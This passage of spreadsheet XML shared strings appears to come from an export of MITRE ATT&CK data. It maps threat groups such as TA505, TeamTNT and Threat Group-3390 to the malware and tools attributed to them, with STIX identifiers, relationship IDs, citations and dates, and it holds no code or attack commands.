    <t>Rancor</t>
  </si>
  <si>
    <t>intrusion-set--f40eb8ce-2a74-4e56-89a1-227021410142</t>
  </si>
  <si>
    <t>S0255</t>
  </si>
  <si>
    <t>DDKONG</t>
  </si>
  <si>
    <t>malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb</t>
  </si>
  <si>
    <t>(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--5986609f-f047-4f71-8918-e0d7d33416f0</t>
  </si>
  <si>
    <t>S0254</t>
  </si>
  <si>
    <t>PLAINTEE</t>
  </si>
  <si>
    <t>malware--21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b</t>
  </si>
  <si>
    <t>relationship--6287195f-bb8e-45e2-8701-76ec2c5e7a60</t>
  </si>
  <si>
    <t>relationship--27a1b804-f54c-4e9f-ad89-fd565a66c180</t>
  </si>
  <si>
    <t>relationship--be7a1288-68fd-4125-969b-bd123865c6b1</t>
  </si>
  <si>
    <t>S0606</t>
  </si>
  <si>
    <t>Bad Rabbit</t>
  </si>
  <si>
    <t>malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a</t>
  </si>
  <si>
    <t>(Citation: Secureworks IRON VIKING )</t>
  </si>
  <si>
    <t>relationship--129a4d3f-fa4a-42c3-833e-8f15155b9693</t>
  </si>
  <si>
    <t>(Citation: iSIGHT Sandworm 2014)(Citation: F-Secure BlackEnergy 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Secureworks IRON VIKING )</t>
  </si>
  <si>
    <t>relationship--b349ef5f-4a05-4eef-afe4-1543b8c832fa</t>
  </si>
  <si>
    <t>S0687</t>
  </si>
  <si>
    <t>Cyclops Blink</t>
  </si>
  <si>
    <t>malware--b350b47f-88fe-4921-8538-6d9c59bac84e</t>
  </si>
  <si>
    <t>(Citation: NCSC CISA Cyclops Blink Advisory February 2022)(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>relationship--6409dbdd-d253-4b4a-8740-8b9592c75f25</t>
  </si>
  <si>
    <t>S0401</t>
  </si>
  <si>
    <t>Exaramel for Linux</t>
  </si>
  <si>
    <t>malware--11194d8b-fdce-45d2-8047-df15bb8f16bd</t>
  </si>
  <si>
    <t>(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--3bf307c2-efb0-40b1-b896-82d15a9bce5f</t>
  </si>
  <si>
    <t>S0343</t>
  </si>
  <si>
    <t>Exaramel for Windows</t>
  </si>
  <si>
    <t>malware--051eaca1-958f-4091-9e5f-a9acd8f820b5</t>
  </si>
  <si>
    <t>(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>relationship--40ecbb46-642a-4742-be84-8ec34382e7c0</t>
  </si>
  <si>
    <t>S0342</t>
  </si>
  <si>
    <t>GreyEnergy</t>
  </si>
  <si>
    <t>malware--308b3d68-a084-4dfb-885a-3125e1a9c1e8</t>
  </si>
  <si>
    <t>relationship--460652b5-ffb6-437e-8594-430b62eed38e</t>
  </si>
  <si>
    <t>(Citation: Microsoft Prestige ransomware October 2022)</t>
  </si>
  <si>
    <t>relationship--e4c6b2e0-e644-4bb6-b2d0-f5a757ed9485</t>
  </si>
  <si>
    <t>19 January 2023</t>
  </si>
  <si>
    <t>(Citation: Dragos Crashoverride 2018)(Citation: Dragos Crashoverride 2017)(Citation: ESET Industroyer)(Citation: Secureworks IRON VIKING)</t>
  </si>
  <si>
    <t>relationship--9f07c92a-78a0-438a-8cb2-01e2bddaeb42</t>
  </si>
  <si>
    <t>04 January 2021</t>
  </si>
  <si>
    <t>S1072</t>
  </si>
  <si>
    <t>Industroyer2</t>
  </si>
  <si>
    <t>malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5</t>
  </si>
  <si>
    <t>(Citation: Industroyer2 ESET April 2022)</t>
  </si>
  <si>
    <t>relationship--9f43126d-5f6c-42a9-9908-49175c27ead7</t>
  </si>
  <si>
    <t>S0231</t>
  </si>
  <si>
    <t>Invoke-PSImage</t>
  </si>
  <si>
    <t>tool--b52d6583-14a2-4ddc-8527-87fd2142558f</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--e7e5e5af-7ef8-43a4-88c6-8f142ee3e1c9</t>
  </si>
  <si>
    <t>25 November 2020</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Secureworks IRON VIKING )</t>
  </si>
  <si>
    <t>relationship--ce64ed04-f0ff-4897-b636-3177c9c5d9bb</t>
  </si>
  <si>
    <t>20 January 2021</t>
  </si>
  <si>
    <t>(Citation: Dragos Crashoverride 2018)</t>
  </si>
  <si>
    <t>relationship--30c4bdc2-1697-4eb6-ac74-3cfb86d17a5b</t>
  </si>
  <si>
    <t>relationship--d993160c-17cd-4026-996a-f7c9bb5b5fc7</t>
  </si>
  <si>
    <t>S0368</t>
  </si>
  <si>
    <t>NotPetya</t>
  </si>
  <si>
    <t>malware--5719af9d-6b16-46f9-9b28-fb019541ddbb</t>
  </si>
  <si>
    <t>(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Secureworks IRON VIKING )(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>relationship--c5dd0d66-99f1-4efd-b0f9-bf9f9118ff16</t>
  </si>
  <si>
    <t>S0365</t>
  </si>
  <si>
    <t>Olympic Destroyer</t>
  </si>
  <si>
    <t>malware--3249e92a-870b-426d-8790-ba311c1abfb4</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike GTR 2019)(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Trend Micro Cyclops Blink March 2022)</t>
  </si>
  <si>
    <t>relationship--f7bfecc9-a5ff-43c4-ad9e-4ca8c64c7fe2</t>
  </si>
  <si>
    <t>S0598</t>
  </si>
  <si>
    <t>P.A.S. Webshell</t>
  </si>
  <si>
    <t>malware--4800d0f9-00aa-47cd-a4d2-92198585b8fd</t>
  </si>
  <si>
    <t>(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--53da73de-7983-4517-8e59-a1b305fcfac0</t>
  </si>
  <si>
    <t>S1058</t>
  </si>
  <si>
    <t>Prestige</t>
  </si>
  <si>
    <t>malware--1da748a5-875d-4212-9222-b4c23ab861be</t>
  </si>
  <si>
    <t>relationship--500bb3d4-9c5e-4020-b173-1a83e5ce1c3c</t>
  </si>
  <si>
    <t>20 January 2023</t>
  </si>
  <si>
    <t>relationship--4d1f00f6-30cc-48b6-baef-66a7fe3cbe86</t>
  </si>
  <si>
    <t>G0029</t>
  </si>
  <si>
    <t>Scarlet Mimic</t>
  </si>
  <si>
    <t>intrusion-set--c5574ca0-d5a4-490a-b207-e4658e5fd1d7</t>
  </si>
  <si>
    <t>S0077</t>
  </si>
  <si>
    <t>CallMe</t>
  </si>
  <si>
    <t>malware--cb7bcf6f-085f-41db-81ee-4b68481661b5</t>
  </si>
  <si>
    <t>(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--a4106a52-b3e7-4aa9-b2ca-125f206dbf91</t>
  </si>
  <si>
    <t>S0076</t>
  </si>
  <si>
    <t>FakeM</t>
  </si>
  <si>
    <t>malware--bb3c1098-d654-4620-bf40-694386d28921</t>
  </si>
  <si>
    <t>relationship--e577372f-c3c9-4e12-9bc6-3f6a1faec0ac</t>
  </si>
  <si>
    <t>S0079</t>
  </si>
  <si>
    <t>MobileOrder</t>
  </si>
  <si>
    <t>malware--463f68f1-5cde-4dc2-a831-68b73488f8f4</t>
  </si>
  <si>
    <t>relationship--9155d072-d94b-4a63-b089-26781aff5275</t>
  </si>
  <si>
    <t>S0078</t>
  </si>
  <si>
    <t>Psylo</t>
  </si>
  <si>
    <t>malware--dfb5fa9b-3051-4b97-8035-08f80aef945b</t>
  </si>
  <si>
    <t>relationship--79934567-99e6-4184-8b04-717a1b401006</t>
  </si>
  <si>
    <t>G1008</t>
  </si>
  <si>
    <t>SideCopy</t>
  </si>
  <si>
    <t>intrusion-set--03be849d-b5a2-4766-9dda-48976bae5710</t>
  </si>
  <si>
    <t>S1028</t>
  </si>
  <si>
    <t>Action RAT</t>
  </si>
  <si>
    <t>malware--36801ffb-5c85-4c50-9121-6122e389366d</t>
  </si>
  <si>
    <t>relationship--dc80f7b4-ea52-47ed-a6a3-7fd3fc96d319</t>
  </si>
  <si>
    <t>07 August 2022</t>
  </si>
  <si>
    <t>S1029</t>
  </si>
  <si>
    <t>AuTo Stealer</t>
  </si>
  <si>
    <t>malware--3e4e2c79-2b27-4245-a5c1-5586a3cbd8f5</t>
  </si>
  <si>
    <t>relationship--8528d601-e1a2-4c59-965e-fb0b65dece43</t>
  </si>
  <si>
    <t>G0121</t>
  </si>
  <si>
    <t>Sidewinder</t>
  </si>
  <si>
    <t>intrusion-set--3fc023b2-c5cc-481d-9c3e-70141ae1a87e</t>
  </si>
  <si>
    <t>(Citation: ATT Sidewinder January 2021)</t>
  </si>
  <si>
    <t>relationship--eab4c1aa-d84d-4111-ab87-710345bdd31d</t>
  </si>
  <si>
    <t>G0091</t>
  </si>
  <si>
    <t>Silence</t>
  </si>
  <si>
    <t>intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321</t>
  </si>
  <si>
    <t>(Citation: Group IB Silence Aug 2019)</t>
  </si>
  <si>
    <t>relationship--1567fbd3-5d2b-4040-a736-11f3d5e2139f</t>
  </si>
  <si>
    <t>(Citation: Group IB Silence Sept 2018)</t>
  </si>
  <si>
    <t>relationship--da331399-4c9f-4a16-92b1-97e635703c18</t>
  </si>
  <si>
    <t>(Citation: SecureList Silence Nov 2017)</t>
  </si>
  <si>
    <t>relationship--465385c3-8659-4225-82b3-215dfc66ba83</t>
  </si>
  <si>
    <t>24 May 2019</t>
  </si>
  <si>
    <t>G0083</t>
  </si>
  <si>
    <t>SilverTerrier</t>
  </si>
  <si>
    <t>intrusion-set--76565741-3452-4069-ab08-80c0ea95bbeb</t>
  </si>
  <si>
    <t>S0331</t>
  </si>
  <si>
    <t>Agent Tesla</t>
  </si>
  <si>
    <t>malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8</t>
  </si>
  <si>
    <t>(Citation: Unit42 SilverTerrier 2018)</t>
  </si>
  <si>
    <t>relationship--7a9b075d-4a37-4b89-8643-8b4376b79416</t>
  </si>
  <si>
    <t>relationship--e50b6d7a-8c22-45f3-9d60-383064cc58d4</t>
  </si>
  <si>
    <t>S0447</t>
  </si>
  <si>
    <t>Lokibot</t>
  </si>
  <si>
    <t>malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae</t>
  </si>
  <si>
    <t>relationship--e8948840-b0a0-4c10-87f4-022720dc8dd9</t>
  </si>
  <si>
    <t>relationship--d88c3036-bcaf-4897-a47e-3cabc0dbc1b2</t>
  </si>
  <si>
    <t>relationship--69205d34-6967-40df-baed-45b5d23d8e27</t>
  </si>
  <si>
    <t>G0054</t>
  </si>
  <si>
    <t>Sowbug</t>
  </si>
  <si>
    <t>intrusion-set--d1acfbb3-647b-4723-9154-800ec119006e</t>
  </si>
  <si>
    <t>S0171</t>
  </si>
  <si>
    <t>Felismus</t>
  </si>
  <si>
    <t>malware--196f1f32-e0c2-4d46-99cd-234d4b6befe1</t>
  </si>
  <si>
    <t>(Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>relationship--b2496438-9431-40e5-8ca0-2ec713f342c3</t>
  </si>
  <si>
    <t>S0188</t>
  </si>
  <si>
    <t>Starloader</t>
  </si>
  <si>
    <t>malware--96566860-9f11-4b6f-964d-1c924e4f24a4</t>
  </si>
  <si>
    <t>relationship--64aab090-e7c2-4114-8c15-49700b611fb8</t>
  </si>
  <si>
    <t>G0041</t>
  </si>
  <si>
    <t>Strider</t>
  </si>
  <si>
    <t>intrusion-set--277d2f87-2ae5-4730-a3aa-50c1fdff9656</t>
  </si>
  <si>
    <t>S0125</t>
  </si>
  <si>
    <t>Remsec</t>
  </si>
  <si>
    <t>malware--69d6f4a9-fcf0-4f51-bca7-597c51ad0bb8</t>
  </si>
  <si>
    <t>(Citation: Symantec Strider Blog)(Citation: Kaspersky ProjectSauron Blog)</t>
  </si>
  <si>
    <t>relationship--edea5971-fc27-4637-8de9-aabcd50784a7</t>
  </si>
  <si>
    <t>G0039</t>
  </si>
  <si>
    <t>Suckfly</t>
  </si>
  <si>
    <t>intrusion-set--5cbe0d3b-6fb1-471f-b591-4b192915116d</t>
  </si>
  <si>
    <t>S0118</t>
  </si>
  <si>
    <t>Nidiran</t>
  </si>
  <si>
    <t>malware--9e9b9415-a7df-406b-b14d-92bfe6809fbe</t>
  </si>
  <si>
    <t>(Citation: Symantec Suckfly March 2016)(Citation: Symantec Suckfly May 2016)</t>
  </si>
  <si>
    <t>relationship--01b924d7-42dd-412f-a9af-cabcb46512ea</t>
  </si>
  <si>
    <t>G1018</t>
  </si>
  <si>
    <t>TA2541</t>
  </si>
  <si>
    <t>intrusion-set--467271fd-47c0-4e90-a3f9-d84f5cf790d0</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA2541 February 2022)</t>
  </si>
  <si>
    <t>relationship--f2c596fa-0f20-4435-9ace-798954f5be85</t>
  </si>
  <si>
    <t>S1087</t>
  </si>
  <si>
    <t>AsyncRAT</t>
  </si>
  <si>
    <t>tool--6a5947f3-1a36-4653-8734-526df3e1d28d</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA2541 February 2022)(Citation: Morphisec Snip3 May 2021)(Citation: Cisco Operation Layover September 2021)(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--bc99bfb1-8529-4116-b702-07c37d333bcf</t>
  </si>
  <si>
    <t>relationship--8fa8c5c2-4891-49a7-88a6-f0ca4387008a</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: Proofpoint TA2541 February 2022)(Citation: FireEye NETWIRE March 2019)
</t>
  </si>
  <si>
    <t>relationship--e3cda15d-a4c4-4e8e-939c-b980b1c494e2</t>
  </si>
  <si>
    <t>13 September 2023</t>
  </si>
  <si>
    <t>S0379</t>
  </si>
  <si>
    <t>Revenge RAT</t>
  </si>
  <si>
    <t>malware--bdb27a1d-1844-42f1-a0c0-826027ae0326</t>
  </si>
  <si>
    <t>relationship--1ba28e4c-66d1-4e45-bd21-44b7ea174579</t>
  </si>
  <si>
    <t>S1086</t>
  </si>
  <si>
    <t>Snip3</t>
  </si>
  <si>
    <t>malware--4327aff5-f194-440c-b499-4d9730cc1eab</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA2541 February 2022)(Citation: Morphisec Snip3 May 2021)</t>
  </si>
  <si>
    <t>relationship--044e6bdf-a7d1-4f70-8591-193ad4fab387</t>
  </si>
  <si>
    <t>relationship--3f15c9e4-93d9-4fd9-891f-3d9ca982a030</t>
  </si>
  <si>
    <t>S0283</t>
  </si>
  <si>
    <t>jRAT</t>
  </si>
  <si>
    <t>malware--efece7e8-e40b-49c2-9f84-c55c5c93d05c</t>
  </si>
  <si>
    <t>relationship--3b6a298e-f389-412e-8ff1-27028baabccc</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA2541 February 2022)(Citation: Cisco Operation Layover September 2021)</t>
  </si>
  <si>
    <t>relationship--f528d6d4-7118-48f4-a875-310a2f511900</t>
  </si>
  <si>
    <t>G0062</t>
  </si>
  <si>
    <t>TA459</t>
  </si>
  <si>
    <t>intrusion-set--62a64fd3-aaf7-4d09-a375-d6f8bb118481</t>
  </si>
  <si>
    <t>S0033</t>
  </si>
  <si>
    <t>NetTraveler</t>
  </si>
  <si>
    <t>malware--cafd0bf8-2b9c-46c7-ae3c-3e0f42c5062e</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>relationship--63de6e73-7ec5-4cae-8d08-9c64428b52bf</t>
  </si>
  <si>
    <t>relationship--6e763ef9-94cb-4244-bea8-86e6d19bfb71</t>
  </si>
  <si>
    <t>S0230</t>
  </si>
  <si>
    <t>ZeroT</t>
  </si>
  <si>
    <t>malware--4ab44516-ad75-4e43-a280-705dc0420e2f</t>
  </si>
  <si>
    <t>relationship--9a29dd75-31b1-4385-beb9-e093851849f6</t>
  </si>
  <si>
    <t>[TA459](https://attack.mitre.org/groups/G0062) has used a Gh0st variant known as PCrat/Gh0st.(Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>relationship--0d432cda-9684-4daa-a66f-c65ad90ff2b7</t>
  </si>
  <si>
    <t>G0092</t>
  </si>
  <si>
    <t>TA505</t>
  </si>
  <si>
    <t>intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d</t>
  </si>
  <si>
    <t>(Citation: NCC Group TA505)</t>
  </si>
  <si>
    <t>relationship--01253fc1-ee00-438a-ba98-fc8db655b7d3</t>
  </si>
  <si>
    <t>S1025</t>
  </si>
  <si>
    <t>Amadey</t>
  </si>
  <si>
    <t>malware--05318127-5962-444b-b900-a9dcfe0ff6e9</t>
  </si>
  <si>
    <t>(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>relationship--8f533903-39c5-4463-a0f6-8017fc6b10ab</t>
  </si>
  <si>
    <t>S0344</t>
  </si>
  <si>
    <t>Azorult</t>
  </si>
  <si>
    <t>malware--f9b05f33-d45d-4e4d-aafe-c208d38a0080</t>
  </si>
  <si>
    <t>relationship--15d668bc-9f10-49eb-8ed1-dfc82b8b8a62</t>
  </si>
  <si>
    <t>relationship--77d30a4e-d267-4416-85f2-edebc0a6af29</t>
  </si>
  <si>
    <t>S0611</t>
  </si>
  <si>
    <t>Clop</t>
  </si>
  <si>
    <t>malware--cad3ba95-8c89-4146-ab10-08daa813f9de</t>
  </si>
  <si>
    <t>(Citation: Unit42 Clop April 2021)(Citation: Cybereason Clop Dec 2020)</t>
  </si>
  <si>
    <t>relationship--0d6df769-7a34-4642-85f5-bf577973456e</t>
  </si>
  <si>
    <t>relationship--74dcdf15-ebdf-4faa-8316-cbf1429a8cea</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>relationship--1e7f0283-1aeb-4b9e-81e0-4aec48e30228</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--1b215137-e9e7-4022-af63-8d932c384eb2</t>
  </si>
  <si>
    <t>28 May 2019</t>
  </si>
  <si>
    <t>S0383</t>
  </si>
  <si>
    <t>FlawedGrace</t>
  </si>
  <si>
    <t>malware--43155329-3edf-47a6-9a14-7dac899b01e4</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 Jan 2019)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--60026624-0ae9-439a-8ee8-faee7ce6ddf0</t>
  </si>
  <si>
    <t>29 May 2019</t>
  </si>
  <si>
    <t>S0460</t>
  </si>
  <si>
    <t>Get2</t>
  </si>
  <si>
    <t>malware--099ecff2-41b8-436d-843c-038a9aa9aa69</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>relationship--351bb2c4-db16-4c82-9539-3851dd61c608</t>
  </si>
  <si>
    <t>relationship--1d0d0fe6-f16d-4c69-bbaf-1d5423b852fb</t>
  </si>
  <si>
    <t>(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>relationship--c5be8127-669e-49b9-b603-581e3498d203</t>
  </si>
  <si>
    <t>relationship--e3c860e4-c981-4a9a-8a8e-8ba0207f834b</t>
  </si>
  <si>
    <t>S0461</t>
  </si>
  <si>
    <t>SDBbot</t>
  </si>
  <si>
    <t>malware--92b03a94-7147-4952-9d5a-b4d24da7487c</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>relationship--c07d6bad-8249-46c2-971f-66e779229be0</t>
  </si>
  <si>
    <t>S0382</t>
  </si>
  <si>
    <t>ServHelper</t>
  </si>
  <si>
    <t>malware--aae22730-e571-4d17-b037-65f2a3e26213</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>relationship--7575fb4d-0fa3-4a16-acb6-734841da41bc</t>
  </si>
  <si>
    <t>S0266</t>
  </si>
  <si>
    <t>TrickBot</t>
  </si>
  <si>
    <t>malware--00806466-754d-44ea-ad6f-0caf59cb8556</t>
  </si>
  <si>
    <t>(Citation: Proofpoint TA505 Sep 2017)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>relationship--239a4ed5-afe6-4d1d-8dfe-ee4df7bc01ba</t>
  </si>
  <si>
    <t>G0127</t>
  </si>
  <si>
    <t>TA551</t>
  </si>
  <si>
    <t>intrusion-set--94873029-f950-4268-9cfd-5032e15cb182</t>
  </si>
  <si>
    <t>S0483</t>
  </si>
  <si>
    <t>IcedID</t>
  </si>
  <si>
    <t>malware--5147ef15-1cae-4707-8ea1-bee8d98b7f1d</t>
  </si>
  <si>
    <t>(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: Unit 42 TA551 Jan 2021)(Citation: Secureworks GOLD CABIN)</t>
  </si>
  <si>
    <t>relationship--356cef7e-2994-4e52-8985-e046e8cc5513</t>
  </si>
  <si>
    <t>S0650</t>
  </si>
  <si>
    <t>QakBot</t>
  </si>
  <si>
    <t>malware--edc5e045-5401-42bb-ad92-52b5b2ee0de9</t>
  </si>
  <si>
    <t>(Citation: ATT QakBot April 2021)</t>
  </si>
  <si>
    <t>relationship--0ce8fbfc-10cf-4fd4-8314-5a3f184a986d</t>
  </si>
  <si>
    <t>30 September 2021</t>
  </si>
  <si>
    <t>S0386</t>
  </si>
  <si>
    <t>Ursnif</t>
  </si>
  <si>
    <t>malware--1492d0f8-7e14-4af3-9239-bc3fe10d3407</t>
  </si>
  <si>
    <t>relationship--eca046f5-9175-4010-8297-07281f588934</t>
  </si>
  <si>
    <t>S0476</t>
  </si>
  <si>
    <t>Valak</t>
  </si>
  <si>
    <t>malware--ade37ada-14af-4b44-b36c-210eec255d53</t>
  </si>
  <si>
    <t>relationship--39a3fca6-cdf6-4053-b4fe-eb5d46fc729f</t>
  </si>
  <si>
    <t>G0088</t>
  </si>
  <si>
    <t>TEMP.Veles</t>
  </si>
  <si>
    <t>intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4</t>
  </si>
  <si>
    <t>(Citation: FireEye TRITON 2019)</t>
  </si>
  <si>
    <t>relationship--57216102-21aa-402b-b306-79e1dd548716</t>
  </si>
  <si>
    <t>16 April 2019</t>
  </si>
  <si>
    <t>(Citation: FireEye TRITON 2019)(Citation: Dragos Xenotime 2018)</t>
  </si>
  <si>
    <t>relationship--a8068bc5-7382-448b-9583-1f61edb68b96</t>
  </si>
  <si>
    <t>G0139</t>
  </si>
  <si>
    <t>TeamTNT</t>
  </si>
  <si>
    <t>intrusion-set--35d1b3be-49d4-42f1-aaa6-ef159c880bca</t>
  </si>
  <si>
    <t>S0601</t>
  </si>
  <si>
    <t>Hildegard</t>
  </si>
  <si>
    <t>malware--40a1b8ec-7295-416c-a6b1-68181d86f120</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>relationship--a822d946-b839-469a-90bf-fbe699faf160</t>
  </si>
  <si>
    <t>(Citation: ATT TeamTNT Chimaera September 2020)</t>
  </si>
  <si>
    <t>relationship--a38bce09-385d-44b0-91a4-307ee5d328c3</t>
  </si>
  <si>
    <t>S0179</t>
  </si>
  <si>
    <t>MimiPenguin</t>
  </si>
  <si>
    <t>tool--5a33468d-844d-4b1f-98c9-0e786c556b27</t>
  </si>
  <si>
    <t>(Citation: Palo Alto Black-T October 2020)</t>
  </si>
  <si>
    <t>relationship--9c68c07e-bb35-416b-83ec-c8c8530eccc9</t>
  </si>
  <si>
    <t>S0683</t>
  </si>
  <si>
    <t>Peirates</t>
  </si>
  <si>
    <t>tool--79dd477a-8226-4b3d-ad15-28623675f221</t>
  </si>
  <si>
    <t>(Citation: TeamTNT Cloud Enumeration)</t>
  </si>
  <si>
    <t>relationship--6d887394-6007-451e-beb9-0ce76b58ebc3</t>
  </si>
  <si>
    <t>G0089</t>
  </si>
  <si>
    <t>The White Company</t>
  </si>
  <si>
    <t>intrusion-set--6688d679-ccdb-4f12-abf6-c7545dd767a4</t>
  </si>
  <si>
    <t>(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>relationship--8abfac45-26c2-493f-a4f3-3fb4d196712f</t>
  </si>
  <si>
    <t>02 May 2019</t>
  </si>
  <si>
    <t>12 June 2019</t>
  </si>
  <si>
    <t>relationship--852e45c7-0d49-43ff-b15c-dd4f6d51703f</t>
  </si>
  <si>
    <t>G0028</t>
  </si>
  <si>
    <t>Threat Group-1314</t>
  </si>
  <si>
    <t>intrusion-set--d519164e-f5fa-4b8c-a1fb-cf0172ad0983</t>
  </si>
  <si>
    <t>(Citation: Dell TG-1314)</t>
  </si>
  <si>
    <t>relationship--489e5386-b177-455f-a8b3-d3c6e7afb9b1</t>
  </si>
  <si>
    <t>relationship--f1af286d-9367-45de-aced-a762838e58bd</t>
  </si>
  <si>
    <t>G0027</t>
  </si>
  <si>
    <t>Threat Group-3390</t>
  </si>
  <si>
    <t>intrusion-set--fb366179-766c-4a4a-afa1-52bff1fd601c</t>
  </si>
  <si>
    <t>[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used a modified version of ASPXSpy called ASPXTool.(Citation: Dell TG-3390)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--4a1bfb6c-f110-4785-9dff-4c8e433bf04d</t>
  </si>
  <si>
    <t>(Citation: Dell TG-3390)(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>relationship--71daf1fe-a979-4cbc-bb0d-4e2d6c79274a</t>
  </si>
  <si>
    <t>S0660</t>
  </si>
  <si>
    <t>Clambling</t>
  </si>
  <si>
    <t>malware--6e95feb1-78ee-48d3-b421-4d76663b5c49</t>
  </si>
  <si>
    <t>(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--d226d631-b611-450e-b904-aad115bbe77a</t>
  </si>
  <si>
    <t>23 November 2021</t>
  </si>
  <si>
    <t>(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--4b32f8e0-ba08-45b5-bc9a-b394d99a5aba</t>
  </si>
  <si>
    <t>(Citation: Dell TG-3390)(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--75c3b5f6-a0ca-4afc-baad-ef19ed4317b3</t>
  </si>
  <si>
    <t>S0398</t>
  </si>
  <si>
    <t>HyperBro</t>
  </si>
  <si>
    <t>malware--5e814485-012d-423d-b769-026bfed0f451</t>
  </si>
  <si>
    <t>(Citation: Unit42 Emissary Panda May 2019)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro DRBControl February 2020)(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--a05c887d-9f4b-490c-843e-e6f98641fe77</t>
  </si>
  <si>
    <t>09 July 2019</t>
  </si>
  <si>
    <t>(Citation: Unit42 Emissary Panda May 2019)</t>
  </si>
  <si>
    <t>relationship--565f6cdf-e29b-430d-8b42-e0b0b93fa994</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</si>
  <si>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</si>
  <si>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relationship--4ce5e752-97d6-4803-a49c-0f905729a133</t>
  </si>
  <si>
    <t>(Citation: Dell TG-3390)(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--e7740e58-d87c-44c4-907c-f66b88851ffc</t>
  </si>
  <si>
    <t>(Citation: SecureWorks BRONZE UNION June 2017)</t>
  </si>
  <si>
    <t>relationship--2e45dc12-f493-42ea-829e-011ba786bef1</t>
  </si>
  <si>
    <t>14 July 2019</t>
  </si>
  <si>
    <t>S0664</t>
  </si>
  <si>
    <t>Pandora</t>
  </si>
  <si>
    <t>malware--a545456a-f9a7-47ad-9ea6-8b017def38d1</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Iron Tiger April 2021)</t>
  </si>
  <si>
    <t>relationship--ec9574b7-95ec-4d84-b468-164e918bbffd</t>
  </si>
  <si>
    <t>(Citation: Dell TG-3390)(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Trend Micro DRBControl February 2020)(Citation: Profero APT27 December 2020)</t>
  </si>
  <si>
    <t>relationship--412b7fbf-bc21-4373-9f2c-5f0a26482536</t>
  </si>
  <si>
